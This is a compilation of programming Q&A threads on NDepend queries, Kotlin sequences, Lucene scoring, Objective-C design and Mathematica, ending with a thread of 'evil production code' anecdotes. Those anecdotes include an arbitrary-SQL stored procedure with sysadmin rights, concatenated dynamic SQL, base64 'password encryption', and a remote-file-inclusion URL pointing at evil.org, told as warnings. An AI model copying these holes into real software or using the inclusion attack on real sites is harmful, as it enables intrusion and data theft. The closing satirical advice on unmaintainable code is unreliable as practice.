NDepend Count, Average, etc. reporting of aggregates. Possible? Clean workarounds?

We have a huge code base, where the "methods with too many local variables" query alone returns 226 methods. I don't want this huge table being dumped into the XML output to clutter it up, and I'd like the top 10 if possible, but what I really want is the count so we can do trending and executive summaries. Is there a clean/efficient/scalable, non-hacky way to do this?
I imagine I could use an executable task instead of the NDepend task (so that the merge is not automatic and the clutter doesn't get merged), then manually operate on those files to get a summary, but I'd like to know if there is a shorter path?

What about defining a baseline, to take into account only new flaws?
what I really want is the count so we can do trending and executive summaries
Trending can be easily achieved with code queries and rules over LINQ (CQLinq) like: Avoid making complex methods even more complex (Source CC)
// <Name>Avoid making complex methods even more complex (Source CC)</Name>
// To visualize changes in code, right-click a matched method and select:
// - Compare older and newer versions of source file
// - Compare older and newer versions disassembled with Reflector
warnif count > 0
from m in JustMyCode.Methods where
!m.IsAbstract &&
m.IsPresentInBothBuilds() &&
m.CodeWasChanged()
let oldCC = m.OlderVersion().CyclomaticComplexity
where oldCC > 6 && m.CyclomaticComplexity > oldCC
select new { m,
oldCC ,
newCC = m.CyclomaticComplexity ,
oldLoc = m.OlderVersion().NbLinesOfCode,
newLoc = m.NbLinesOfCode,
}
or Avoid transforming an immutable type into a mutable one.


Kotlin stdlib operations vs for loops

I wrote the following code:
val src = (0 until 1000000).toList()
val dest = ArrayList<Double>(src.size / 2 + 1)
for (i in src)
{
if (i % 2 == 0) dest.add(Math.sqrt(i.toDouble()))
}
IntelliJ (in my case Android Studio) is asking me if I want to replace the for loop with operations from stdlib. This results in the following code:
val src = (0 until 1000000).toList()
val dest = ArrayList<Double>(src.size / 2 + 1)
src.filter { it % 2 == 0 }
.mapTo(dest) { Math.sqrt(it.toDouble()) }
Now I must say, I like the changed code. I find it easier to write than for loops when I run into similar situations. However, upon reading what the filter function does, I realized that this is a lot slower than the for loop. The filter function creates a new list containing only the elements from src that match the predicate. So there is one more list created and one more loop in the stdlib version of the code. Of course, for small lists it might not be important, but in general this does not sound like a good alternative. Especially if one chains more methods like this, you can get a lot of additional loops that could be avoided by writing a for loop.
My question is: what is considered good practice in Kotlin? Should I stick to for loops, or am I missing something and it does not work the way I think it works?
If you are concerned about performance, what you need is Sequence. For example, your above code will be
val src = (0 until 1000000).toList()
val dest = ArrayList<Double>(src.size / 2 + 1)
src.asSequence()
.filter { it % 2 == 0 }
.mapTo(dest) { Math.sqrt(it.toDouble()) }
In the above code, filter returns another Sequence, which represents an intermediate step. Nothing is really created yet, no object or array creation (except a new Sequence wrapper). Only when mapTo, a terminal operator, is called is the resulting collection created.
If you have learned Java 8 streams, you may find the above explanation somewhat familiar. Actually, Sequence is roughly the Kotlin equivalent of a Java 8 Stream. They share a similar purpose and performance characteristics. The only difference is that Sequence isn't designed to work with ForkJoinPool, and is thus a lot easier to implement.
When there are multiple steps involved or the collection may be large, it's suggested to use Sequence instead of plain .filter {...}.mapTo {...}. I also suggest you use the Sequence form instead of your imperative form because it's easier to understand. Imperative code may become complex, and thus hard to understand, when there are 5 or more steps involved in the data processing. If there is just one step, you don't need a Sequence, because it just creates garbage and gives you nothing useful.
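To make that Java 8 analogy concrete, here is a rough Java Stream equivalent of the lazy pipeline above (a sketch only, not taken from the original answer): the filter and map stages do no work until the terminal collect runs.
import java.util.List;
import java.util.stream.Collectors;
import java.util.stream.IntStream;

public class LazyPipeline {
    public static void main(String[] args) {
        List<Double> dest = IntStream.range(0, 1_000_000)
                .filter(i -> i % 2 == 0)       // intermediate: nothing evaluated yet
                .mapToDouble(Math::sqrt)       // intermediate: still lazy
                .boxed()
                .collect(Collectors.toList()); // terminal: the list is built here
        System.out.println(dest.size());       // 500000
    }
}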
You're missing something. :-)
In this particular case, you can use an IntProgression:
val progression = 0 until 1_000_000 step 2
You can then create your desired list of square roots in various ways:
// may make the list larger than necessary
// its internal array is copied each time the list grows beyond its capacity
// code is very straight forward
progression.map { Math.sqrt(it.toDouble()) }
// will make the list the exact size needed
// no copies are made
// code is more complicated
progression.mapTo(ArrayList(progression.last / 2 + 1)) { Math.sqrt(it.toDouble()) }
// will make the list the exact size needed
// a single intermediate list is made
// code is minimal and makes sense
progression.toList().map { Math.sqrt(it.toDouble()) }
My advice would be to choose whichever coding style you prefer. Kotlin is both an object-oriented and a functional language, meaning both of your propositions are correct.
Usually, functional constructs favor readability over performance; however, in some cases, procedural code will also be more readable. You should try to stick with one style as much as possible, but don't be afraid to switch some code if you feel like it's better suited to your constraints, either readability, performance, or both.
The converted code does not need the manual creation of the destination list, and can be simplified to:
val src = (0 until 1000000).toList()
val dest = src.filter { it % 2 == 0 }
.map { Math.sqrt(it.toDouble()) }
And as mentioned in the excellent answer by @glee8e, you can use a sequence to do lazy evaluation. The simplified code using a sequence:
val src = (0 until 1000000).toList()
val dest = src.asSequence() // change to lazy
.filter { it % 2 == 0 }
.map { Math.sqrt(it.toDouble()) }
.toList() // create the final list
Note that the addition of toList() at the end changes the sequence back into a final list, which is the one copy made during the processing. You can omit that step to remain a sequence.
It is important to highlight the comments by @hotkey saying that you should not always assume that another iteration or a copy of a list causes worse performance than lazy evaluation. @hotkey says:
Sometimes several loops, even if they copy the whole collection, show good performance because of good locality of reference. See: Kotlin's Iterable and Sequence look exactly same. Why are two types required?
And excerpted from that link:
... in most cases it has good locality of reference thus taking advantage of CPU cache, prediction, prefetching etc. so that even multiple copying of a collection still works good enough and performs better in simple cases with small collections.
@glee8e says that there are similarities between Kotlin sequences and Java 8 streams; for detailed comparisons see: What Java 8 Stream.collect equivalents are available in the standard Kotlin library?

Getting Term Frequencies For Query

In Lucene, a query can be composed of many sub-queries. (such as TermQuery objects)
I'd like a way to iterate over the documents returned by a search, and for each document, to then iterate over the sub-queries.
For each sub-query, I'd like to get the number of times it matched. (I'm also interested in the fieldNorm, etc.)
I can get access to that data by using indexSearcher.explain, but that feels quite hacky because I would then need to parse the "description" member of each nested Explanation object to try and find the term frequency, etc. (also, calling "explain" is very slow, so I'm hoping for a faster approach)
The context here is that I'd like to experiment with re-ranking Lucene's top N search results, and to do that it's obviously helpful to extract as many "features" as possible about the matches.
From looking at the source code for classes like TermQuery, the following appears to be a basic approach:
// For each document... (scoreDoc.doc is an integer)
Weight weight = weightCache.get(query);
if (weight == null)
{
weight = query.createWeight(indexSearcher, true);
weightCache.put(query, weight);
}
IndexReaderContext context = indexReader.getContext();
List<LeafReaderContext> leafContexts = context.leaves();
int n = ReaderUtil.subIndex(scoreDoc.doc, leafContexts);
LeafReaderContext leafReaderContext = leafContexts.get(n);
Scorer scorer = weight.scorer(leafReaderContext);
int deBasedDoc = scoreDoc.doc - leafReaderContext.docBase;
int thisDoc = scorer.iterator().advance(deBasedDoc);
float freq = 0;
if (thisDoc == deBasedDoc)
{
freq = scorer.freq();
}
The weightCache is of type Map<Query, Weight> and is useful so that you don't have to re-create the Weight object for every document you process (otherwise, the code runs about 10x slower).
Is this approximately what I should be doing? Are there any obvious ways to make this run faster? (it takes approx 2 ms for 280 documents, as compared to about 1 ms to perform the query itself)
Another challenge with this approach is that it requires code to navigate through your Query object to find the sub-queries. For example, if it's a BooleanQuery, you call query.clauses() and recurse on the clauses to look for all leaf TermQuery objects, etc. I'm not sure if there is a more elegant / less brittle way to do that.
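For what it's worth, here is a rough sketch of that recursion (assuming the BooleanQuery.clauses() and BooleanClause.getQuery() methods available in recent Lucene versions; other Query subclasses such as phrase or boost queries would need their own cases):
import java.util.ArrayList;
import java.util.List;
import org.apache.lucene.search.BooleanClause;
import org.apache.lucene.search.BooleanQuery;
import org.apache.lucene.search.Query;
import org.apache.lucene.search.TermQuery;

final class QueryLeaves {
    // Collect the leaf TermQuery objects of a query by recursing through BooleanQuery clauses.
    static List<TermQuery> collectTermQueries(Query query) {
        List<TermQuery> leaves = new ArrayList<>();
        collect(query, leaves);
        return leaves;
    }

    private static void collect(Query query, List<TermQuery> out) {
        if (query instanceof TermQuery) {
            out.add((TermQuery) query);
        } else if (query instanceof BooleanQuery) {
            for (BooleanClause clause : ((BooleanQuery) query).clauses()) {
                collect(clause.getQuery(), out);
            }
        }
        // Any other query type is silently skipped in this sketch.
    }
}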

Nested arrays of methods/data

I have a question regarding nested arrays of objects.
I'm writing a simple Objective-C program (I'm a beginner) and I was wondering whether it is advisable to structure an array in such a way that not only are all the individual batting scores logged (data), but methods embedded in the nested arrays can also be used to interrogate this data.
For example the line below is easily readable (even for those who are not cricket fans!)
Team1.Over[2].BowlNumber[3].score = 6
Team 1 scored a 6 during the 3rd bowl in the 2nd Over.
I would also like to do something like the following, where I can use a method to interrogate the data. The method line below would just cycle through the scores within BowlNumber[] and total them up:
Total =  Over[2].TotalForAmountForOver()
I could set up and manage all the arrays from within main(), but it's much easier to read if I can embed as much as possible within the structure.
Is this a common approach?
 
Haven't seen many examples of fairly complicated embedded arrays of data and methods…. 
You'd easily be able to achieve this by making Over and Bowl classes that each wrap an NSMutableArray object, e.g.:
- (Over *)getOverNumber:(int)index {
    return [overs objectAtIndex:index];
}
You'd then access it like this:
[[team1 getOverNumber:2] getBowlNumber:2].score = 6;
int total = [[team1 getOverNumber:2] totalForAmountForOver];
You'd implement totalForAmountForOver as a method within your Over class.
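As a rough illustration of that shape (sketched here in Java rather than Objective-C, with hypothetical Team/Over/Bowl names), each class wraps its own collection and exposes the queries that belong to that level of the nesting:
import java.util.ArrayList;
import java.util.List;

class Bowl {
    int score;
    Bowl(int score) { this.score = score; }
}

class Over {
    private final List<Bowl> bowls = new ArrayList<>();

    void addBowl(Bowl bowl) { bowls.add(bowl); }
    Bowl getBowlNumber(int index) { return bowls.get(index); }

    // The "interrogation" method lives next to the data it summarises.
    int totalForOver() {
        int total = 0;
        for (Bowl bowl : bowls) total += bowl.score;
        return total;
    }
}

class Team {
    private final List<Over> overs = new ArrayList<>();

    void addOver(Over over) { overs.add(over); }
    Over getOverNumber(int index) { return overs.get(index); }
}
Usage then reads much like the question's example: team1.getOverNumber(2).getBowlNumber(3).score and team1.getOverNumber(2).totalForOver().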

Clearing numerical values in Mathematica

I am working on fairly large Mathematica projects and the problem arises that I have to intermittently check numerical results but want to easily revert to having all my constructs in analytical form.
The code is fairly fluid and I don't want to use scoping constructs everywhere, as they add work overhead. Is there an easy way to identify and clear all assignments that are numerical?
EDIT: I really do know that scoping is the way to do this correctly ;-). However, for my workflow I am really just looking for a dirty trick to nix all numerical assignments after the fact instead of having the foresight to put down a Block.
If your assignments are on the top level, you can use something like this:
a = 1;
b = c;
d = 3;
e = d + b;
Cases[DownValues[In],
HoldPattern[lhs_ = rhs_?NumericQ] |
HoldPattern[(lhs_ = rhs_?NumericQ;)] :> Unset[lhs],
3]
This will work if you have a sufficient history length $HistoryLength (it defaults to infinity). Note however that, in the above example, e was assigned 3 + c, and the 3 here was not undone. So the problem is really ambiguous in its formulation, because some numbers can make it into definitions. One way to avoid this is to use SetDelayed for assignments, rather than Set.
Another alternative would be to analyze the names in, say, the Global` context (if that is the context where your symbols live), and then the OwnValues and DownValues of the symbols, in a fashion similar to the above, and remove definitions with purely numerical right-hand sides.
But IMO neither of these approaches is robust. I'd still use scoping constructs and try to isolate the numerics. One possibility is to wrap your final code in Block, and assign numerical values inside this Block. This seems a much cleaner approach. The work overhead is minimal - you just have to remember which symbols you want to assign the values to. Block will automatically ensure that outside it, the symbols have no definitions.
EDIT
Yet another possibility is to use local rules. For example, one could define rule[a] = a -> 1; rule[d] = d -> 3 instead of the assignments above. You could then apply these rules, extracting them as, say, DownValues[rule][[All, 2]], whenever you want to test with some numerical arguments.
Building on Andrew Moylan's solution, one can construct a Block-like function that takes rules:
SetAttributes[BlockRules, HoldRest]
BlockRules[rules_, expr_] :=
Block @@ Append[Apply[Set, Hold@rules, {2}], Unevaluated[expr]]
You can then save your numeric rules in a variable, and use BlockRules[ savedrules, code ], or even define a function that would apply a fixed set of rules, kind of like so:
In[76]:= NumericCheck =
Function[body, BlockRules[{a -> 3, b -> 2`}, body], HoldAll];
In[78]:= a + b // NumericCheck
Out[78]= 5.
EDIT In response to Timo's comment, it might be possible to use NotebookEvaluate (new in 8) to achieve the requested effect.
SetAttributes[BlockRules, HoldRest]
BlockRules[rules_, expr_] :=
Block @@ Append[Apply[Set, Hold@rules, {2}], Unevaluated[expr]]
nb = CreateDocument[{ExpressionCell[
Defer[Plot[Sin[a x], {x, 0, 2 Pi}]], "Input"],
ExpressionCell[Defer[Integrate[Sin[a x^2], {x, 0, 2 Pi}]],
"Input"]}];
BlockRules[{a -> 4}, NotebookEvaluate[nb, InsertResults -> "True"];]
As the result of this evaluation, you get a notebook with your commands evaluated while a was locally set to 4. In order to take it further, you would have to take the notebook with your code, open a new notebook, evaluate Notebooks[] to identify the notebook of interest, and then do:
BlockRules[variablerules,
NotebookEvaluate[NotebookPut[NotebookGet[nbobj]],
InsertResults -> "True"]]
I hope you can make this idea work.

What is the most EVIL code you have ever seen in a production enterprise environment? [closed]

What is the most evil or dangerous code fragment you have ever seen in a production environment at a company? I've never encountered production code that I would consider to be deliberately malicious and evil, so I'm quite curious to see what others have found.
The most dangerous code I have ever seen was a stored procedure two linked servers away from our core production database server. The stored procedure accepted any NVARCHAR(8000) parameter and executed the parameter on the target production server via a double-jump sp_executeSQL command. That is to say, the sp_executeSQL command executed another sp_executeSQL command in order to jump two linked servers. Oh, and the linked server account had sysadmin rights on the target production server.
Warning: Long scary post ahead
I've written about one application I've worked on before here and here. To put it simply, my company inherited 130,000 lines of garbage from India. The application was written in C#; it was a teller app, the same kind of software tellers use behind the counter whenever you go to the bank. The app crashed 40-50 times a day, and it simply couldn't be refactored into working code. My company had to re-write the entire app over the course of 12 months.
Why is this application evil? Because the sight of the source code was enough to drive a sane man mad and a mad man sane. The twisted logic used to write this application could have only been inspired by a Lovecraftian nightmare. Unique features of this application included:
Out of 130,000 lines of code, the entire application contained 5 classes (excluding form files). All of these were public static classes. One class was called Globals.cs, which contained 1000s and 1000s and 1000s of public static variables used to hold the entire state of the application. Those five classes contained 20,000 lines of code total, with the remaining code embedded in the forms.
You have to wonder, how did the programmers manage to write such a big application without any classes? What did they use to represent their data objects? It turns out the programmers managed to re-invent half of the concepts we all learned about OOP simply by combining ArrayLists, HashTables, and DataTables. We saw a lot of this:
ArrayLists of hashtables
Hashtables with string keys and DataRow values
ArrayLists of DataTables
DataRows containing ArrayLists which contained HashTables
ArrayLists of DataRows
ArrayLists of ArrayLists
HashTables with string keys and HashTable values
ArrayLists of ArrayLists of HashTables
Every other combination of ArrayLists, HashTables, DataTables you can think of.
Keep in mind, none of the data structures above are strongly typed, so you have to cast whatever mystery object you get out of the list to the correct type. It's amazing what kind of complex, Rube Goldberg-like data structures you can create using just ArrayLists, HashTables, and DataTables.
To share an example of how the object model detailed above was used, consider Accounts: the original programmer created a separate HashTable for each conceivable property of an account: a HashTable called hstAcctExists, another called hstAcctNeedsOverride, another called hstAcctFirstName, and so on. The keys for all of those hashtables were "|"-separated strings. Conceivable keys included "123456|DDA", "24100|SVG", "100|LNS", etc.
Since the state of the entire application was readily accessible from global variables, the programmers found it unnecessary to pass parameters to methods. I'd say 90% of methods took 0 parameters. Of the few which did, all parameters were passed as strings for convenience, regardless of what the string represented.
Side-effect-free functions did not exist. Every method modified one or more variables in the Globals class. Not all side effects made sense; for example, one of the form validation methods had a mysterious side effect of calculating over and short payments on loans for whatever account was stored in Globals.lngAcctNum.
Although there were lots of forms, there was one form to rule them all: frmMain.cs, which contained a whopping 20,000 lines of code. What did frmMain do? Everything. It looked up accounts, printed receipts, dispensed cash, it did everything.
Sometimes other forms needed to call methods on frmMain. Rather than factor that code out of the form into a separate class, why not just invoke the code directly?
((frmMain)this.MDIParent).UpdateStatusBar(hstValues);
To look up accounts, the programmers did something like this:
bool blnAccountExists =
new frmAccounts().GetAccountInfo().blnAccountExists
As bad as it already is to create an invisible form to perform business logic, how do you think the form knew which account to look up? That's easy: the form could access Globals.lngAcctNum and Globals.strAcctType. (Who doesn't love Hungarian notation?)
Code-reuse was a synonym for ctrl-c, ctrl-v. I found 200-line methods copy/pasted across 20 forms.
The application had a bizarre threading model, something I like to call the thread-and-timer model: each form that spawned a thread had a timer on it. Each thread that was spawned kicked off a timer which had a 200 ms delay; once the timer started, it would check to see if the thread had set some magic boolean, then it would abort the thread. The resulting ThreadAbortException was swallowed.
You'd think you'd only see this pattern once, but I found it in at least 10 different places.
Speaking of threads, the keyword "lock" never appeared in the application. Threads manipulated global state freely without taking a lock.
Every method in the application contained a try/catch block. Every exception was logged and swallowed.
Who needs to switch on enums when switching on strings is just as easy!
Some genius figured out that you can hook multiple form controls up to the same event handler. How did the programmer handle this?
private void OperationButton_Click(object sender, EventArgs e)
{
Button btn = (Button)sender;
if (blnModeIsAddMc)
{
AddMcOperationKeyPress(btn);
}
else
{
string strToBeAppendedLater = string.Empty;
if (btn.Name != "btnBS")
{
UpdateText();
}
if (txtEdit.Text.Trim() != "Error")
{
SaveFormState();
}
switch (btn.Name)
{
case "btnC":
ResetValues();
break;
case "btnCE":
txtEdit.Text = "0";
break;
case "btnBS":
if (!blnStartedNew)
{
string EditText = txtEdit.Text.Substring(0, txtEdit.Text.Length - 1);
DisplayValue((EditText == string.Empty) ? "0" : EditText);
}
break;
case "btnPercent":
blnAfterOp = true;
if (GetValueDecimal(txtEdit.Text, out decCurrValue))
{
AddToTape(GetValueString(decCurrValue), (string)btn.Text, true, false);
decCurrValue = decResultValue * decCurrValue / intFormatFactor;
DisplayValue(GetValueString(decCurrValue));
AddToTape(GetValueString(decCurrValue), string.Empty, true, false);
strToBeAppendedLater = GetValueString(decResultValue).PadLeft(20)
+ strOpPressed.PadRight(3);
if (arrLstTapeHist.Count == 0)
{
arrLstTapeHist.Add(strToBeAppendedLater);
}
blnEqualOccurred = false;
blnStartedNew = true;
}
break;
case "btnAdd":
case "btnSubtract":
case "btnMultiply":
case "btnDivide":
blnAfterOp = true;
if (txtEdit.Text.Trim() == "Error")
{
btnC.PerformClick();
return;
}
if (blnNumPressed || blnEqualOccurred)
{
if (GetValueDecimal(txtEdit.Text, out decCurrValue))
{
if (Operation())
{
AddToTape(GetValueString(decCurrValue), (string)btn.Text, true, true);
DisplayValue(GetValueString(decResultValue));
}
else
{
AddToTape(GetValueString(decCurrValue), (string)btn.Text, true, true);
DisplayValue("Error");
}
strOpPressed = btn.Text;
blnEqualOccurred = false;
blnNumPressed = false;
}
}
else
{
strOpPressed = btn.Text;
AddToTape(GetValueString(0), (string)btn.Text, false, false);
}
if (txtEdit.Text.Trim() == "Error")
{
AddToTape("Error", string.Empty, true, true);
btnC.PerformClick();
txtEdit.Text = "Error";
}
break;
case "btnEqual":
blnAfterOp = false;
if (strOpPressed != string.Empty || strPrevOp != string.Empty)
{
if (GetValueDecimal(txtEdit.Text, out decCurrValue))
{
if (OperationEqual())
{
DisplayValue(GetValueString(decResultValue));
}
else
{
DisplayValue("Error");
}
if (!blnEqualOccurred)
{
strPrevOp = strOpPressed;
decHistValue = decCurrValue;
blnNumPressed = false;
blnEqualOccurred = true;
}
strOpPressed = string.Empty;
}
}
break;
case "btnSign":
GetValueDecimal(txtEdit.Text, out decCurrValue);
DisplayValue(GetValueString(-1 * decCurrValue));
break;
}
}
}
The same genius also discovered the glorious ternary operator. Here are some code samples:
frmTranHist.cs [line 812]:
strDrCr = chkCredits.Checked && chkDebits.Checked ? string.Empty
: chkDebits.Checked ? "D"
: chkCredits.Checked ? "C"
: "N";
frmTellTransHist.cs [line 961]:
if (strDefaultVals == strNowVals && (dsTranHist == null ? true : dsTranHist.Tables.Count == 0 ? true : dsTranHist.Tables[0].Rows.Count == 0 ? true : false))
frmMain.TellCash.cs [line 727]:
if (Validations(parPostMode == "ADD" ? true : false))
Here's a code snippet which demonstrates the typical misuse of StringBuilder. Note how the programmer concatenates a string in a loop, then appends the resulting string to the StringBuilder:
private string CreateGridString()
{
string strTemp = string.Empty;
StringBuilder strBuild = new StringBuilder();
foreach (DataGridViewRow dgrRow in dgvAcctHist.Rows)
{
strTemp = ((DataRowView)dgrRow.DataBoundItem)["Hst_chknum"].ToString().PadLeft(8, ' ');
strTemp += " ";
strTemp += Convert.ToDateTime(((DataRowView)dgrRow.DataBoundItem)["Hst_trandt"]).ToString("MM/dd/yyyy");
strTemp += " ";
strTemp += ((DataRowView)dgrRow.DataBoundItem)["Hst_DrAmount"].ToString().PadLeft(15, ' ');
strTemp += " ";
strTemp += ((DataRowView)dgrRow.DataBoundItem)["Hst_CrAmount"].ToString().PadLeft(15, ' ');
strTemp += " ";
strTemp += ((DataRowView)dgrRow.DataBoundItem)["Hst_trancd"].ToString().PadLeft(4, ' ');
strTemp += " ";
strTemp += GetDescriptionString(((DataRowView)dgrRow.DataBoundItem)["Hst_desc"].ToString(), 30, 62);
strBuild.AppendLine(strTemp);
}
strCreateGridString = strBuild.ToString();
return strCreateGridString;//strBuild.ToString();
}
No primary keys, indexes, or foreign key constraints existed on tables, nearly all fields were of type varchar(50), and 100% of fields were nullable. Interestingly, bit fields were not used to store boolean data; instead a char(1) field was used, and the characters 'Y' and 'N' used to represent true and false respectively.
Speaking of the database, here's a representative example of a stored procedure:
ALTER PROCEDURE [dbo].[Get_TransHist]
(
@TellerID int = null,
@CashDrawer int = null,
@AcctNum bigint = null,
@StartDate datetime = null,
@EndDate datetime = null,
@StartTranAmt decimal(18,2) = null,
@EndTranAmt decimal(18,2) = null,
@TranCode int = null,
@TranType int = null
)
AS
declare @WhereCond Varchar(1000)
declare @strQuery Varchar(2000)
Set @WhereCond = ' '
Set @strQuery = ' '
If not @TellerID is null
Set @WhereCond = @WhereCond + ' AND TT.TellerID = ' + Cast(@TellerID as varchar)
If not @CashDrawer is null
Set @WhereCond = @WhereCond + ' AND TT.CDId = ' + Cast(@CashDrawer as varchar)
If not @AcctNum is null
Set @WhereCond = @WhereCond + ' AND TT.AcctNbr = ' + Cast(@AcctNum as varchar)
If not @StartDate is null
Set @WhereCond = @WhereCond + ' AND Convert(varchar,TT.PostDate,121) >= ''' + Convert(varchar,@StartDate,121) + ''''
If not @EndDate is null
Set @WhereCond = @WhereCond + ' AND Convert(varchar,TT.PostDate,121) <= ''' + Convert(varchar,@EndDate,121) + ''''
If not @TranCode is null
Set @WhereCond = @WhereCond + ' AND TT.TranCode = ' + Cast(@TranCode as varchar)
If not @EndTranAmt is null
Set @WhereCond = @WhereCond + ' AND TT.TranAmt <= ' + Cast(@EndTranAmt as varchar)
If not @StartTranAmt is null
Set @WhereCond = @WhereCond + ' AND TT.TranAmt >= ' + Cast(@StartTranAmt as varchar)
If not (@TranType is null or @TranType = -1)
Set @WhereCond = @WhereCond + ' AND TT.DocType = ' + Cast(@TranType as varchar)
--Get the Teller Transaction Records according to the filters
Set @strQuery = 'SELECT
TT.TranAmt as [Transaction Amount],
TT.TranCode as [Transaction Code],
RTrim(LTrim(TT.TranDesc)) as [Transaction Description],
TT.AcctNbr as [Account Number],
TT.TranID as [Transaction Number],
Convert(varchar,TT.ActivityDateTime,101) as [Activity Date],
Convert(varchar,TT.EffDate,101) as [Effective Date],
Convert(varchar,TT.PostDate,101) as [Post Date],
Convert(varchar,TT.ActivityDateTime,108) as [Time],
TT.BatchID,
TT.ItemID,
isnull(TT.DocumentID, 0) as DocumentID,
TT.TellerName,
TT.CDId,
TT.ChkNbr,
RTrim(LTrim(DT.DocTypeDescr)) as DocTypeDescr,
(CASE WHEN TT.TranMode = ''F'' THEN ''Offline'' ELSE ''Online'' END) TranMode,
DispensedYN
FROM TellerTrans TT WITH (NOLOCK)
LEFT OUTER JOIN DocumentTypes DT WITH (NOLOCK) on DocType = DocumentType
WHERE IsNull(TT.DeletedYN, 0) = 0 ' + @WhereCond + ' Order By BatchId, TranID, ItemID'
Exec (@strQuery)
With all that said, the single biggest problem with this 130,000-line application is this: no unit tests.
Yes, I have sent this story to TheDailyWTF, and then I quit my job.
In a system which took credit card payments we used to store the full credit card number along with name, expiration date etc.
Turns out this is illegal, which is ironic given that we were writing the program for the Justice Department at the time.
I've seen a password encryption function like this
function EncryptPassword($password)
{
return base64_encode($password);
}
This was the error handling routine in a piece of commercial code:
/* FIXME! */
while (TRUE)
;
I was supposed to find out why "the app keeps locking up".
A combination of all of the following PHP 'features' at once:
Register Globals
Variable Variables
Inclusion of remote files and code via include("http:// ... ");
Really horrific array/variable names (literal example):
foreach( $variablesarry as $variablearry ){
include( $$variablearry );
}
(I literally spent an hour trying to work out how that worked before I realised they weren't the same variable.)
Include 50 files, which each include 50 files, and stuff is performed linearly/procedurally across all 50 files in conditional and unpredictable ways.
For those who don't know variable variables:
$x = "hello";
$$x = "world";
print $hello; # "world"
Now consider that $x contains a value from your URL (register globals magic), so nowhere in your code is it obvious what variable you're working with, because it's all determined by the URL.
Now consider what happens when the contents of that variable can be a URL specified by the website's user.
Yes, this may not make sense to you, but it creates a variable named after that URL, i.e. $http://google.com, except it can't be directly accessed; you have to use it via the double-$ technique above.
Additionally, when it's possible for a user to specify a variable on the URL which indicates which file to include, there are nasty tricks like
http://foo.bar.com/baz.php?include=http://evil.org/evilcode.php
and if that variable turns up in include($include)
and 'evilcode.php' prints its code as plain text, and PHP is inappropriately secured, then PHP will just trundle off, download evilcode.php, and execute it as the user of the web server.
The web server will give it all its permissions etc., permitting shell calls, downloading arbitrary binaries and running them, etc., until eventually you wonder why you have a box running out of disk space, and one dir has 8GB of pirated movies with Italian dubbing, being shared on IRC via a bot.
I'm just thankful I discovered that atrocity before the script running the attack decided to do something really dangerous like harvest extremely confidential information from the more or less unsecured database :|
(I could entertain the dailywtf every day for 6 months with that codebase, I kid you not. It's just a shame I discovered the dailywtf after I escaped that code.)
In the main project header file, from an old-hand COBOL programmer, who was inexplicably writing a compiler in C:
int i, j, k;
"So you won't get a compiler error if you forget to declare your loop variables."
The Windows installer.
This article How to Write Unmaintainable Code covers some of the most brilliant techniques known to man. Some of my favorite ones are:
New Uses For Names For Baby
Buy a copy of a baby naming book and you'll never be at a loss for variable names. Fred is a wonderful name, and easy to type. If you're looking for easy-to-type variable names, try adsf or aoeu if you type with a DSK keyboard.
Creative Miss-spelling
If you must use descriptive variable and function names, misspell them. By misspelling in some function and variable names, and spelling it correctly in others (such as SetPintleOpening SetPintalClosing) we effectively negate the use of grep or IDE search techniques. It works amazingly well. Add an international flavor by spelling tory or tori in different theatres/theaters.
Be Abstract
In naming functions and variables, make heavy use of abstract words like it, everything, data, handle, stuff, do, routine, perform and the digits e.g. routineX48, PerformDataFunction, DoIt, HandleStuff and do_args_method.
CapiTaliSaTion
Randomly capitalize the first letter of a syllable in the middle of a word. For example ComputeRasterHistoGram().
Lower Case l Looks a Lot Like the Digit 1
Use lower case l to indicate long constants. e.g. 10l is more likely to be mistaken for 101 than 10L is. Ban any fonts that clearly disambiguate uvw wW gq9 2z 5s il17|!j oO08 `'" ;,. m nn rn {[()]}. Be creative.
Recycle Your Variables
Wherever scope rules permit, reuse existing unrelated variable names. Similarly, use the same temporary variable for two unrelated purposes (purporting to save stack slots). For a fiendish variant, morph the variable, for example, assign a value to a variable at the top of a very long method, and then somewhere in the middle, change the meaning of the variable in a subtle way, such as converting it from a 0-based coordinate to a 1-based coordinate. Be certain not to document this change in meaning.
Cd wrttn wtht vwls s mch trsr
When using abbreviations inside variable or method names, break the boredom with several variants for the same word, and even spell it out longhand once in a while. This helps defeat those lazy bums who use text search to understand only some aspect of your program. Consider variant spellings as a variant on the ploy, e.g. mixing International colour with American color and dude-speak kulerz. If you spell out names in full, there is only one possible way to spell each name. These are too easy for the maintenance programmer to remember. Because there are so many different ways to abbreviate a word, with abbreviations, you can have several different variables that all have the same apparent purpose. As an added bonus, the maintenance programmer might not even notice they are separate variables.
Obscure film references
Use constant names like LancelotsFavouriteColour instead of blue and assign it hex value of $0204FB. The color looks identical to pure blue on the screen, and a maintenance programmer would have to work out 0204FB (or use some graphic tool) to know what it looks like. Only someone intimately familiar with Monty Python and the Holy Grail would know that Lancelot's favorite color was blue. If a maintenance programmer can't quote entire Monty Python movies from memory, he or she has no business being a programmer.
Document the obvious
Pepper the code with comments like /* add 1 to i */ however, never document wooly stuff like the overall purpose of the package or method.
Document How Not Why
Document only the details of what a program does, not what it is attempting to accomplish. That way, if there is a bug, the fixer will have no clue what the code should be doing.
Side Effects
In C, functions are supposed to be idempotent, (without side effects). I hope that hint is sufficient.
Use Octal
Smuggle octal literals into a list of decimal numbers like this:
array = new int []
{
111,
120,
013,
121,
};
Extended ASCII
Extended ASCII characters are perfectly valid as variable names, including ß, Ð, and ñ characters. They are almost impossible to type without copying/pasting in a simple text editor.
Names From Other Languages
Use foreign language dictionaries as a source for variable names. For example, use the German punkt for point. Maintenance coders, without your firm grasp of German, will enjoy the multicultural experience of deciphering the meaning.
Names From Mathematics
Choose variable names that masquerade as mathematical operators, e.g.:
openParen = (slash + asterix) / equals;
Code That Masquerades As Comments and Vice Versa
Include sections of code that are commented out but at first glance do not appear to be.
for(j=0; j<array_len; j+ =8)
{
total += array[j+0 ];
total += array[j+1 ];
total += array[j+2 ]; /* Main body of
total += array[j+3]; * loop is unrolled
total += array[j+4]; * for greater speed.
total += array[j+5]; */
total += array[j+6 ];
total += array[j+7 ];
}
Without the colour coding would you notice that three lines of code are commented out?
Arbitrary Names That Masquerade as Keywords
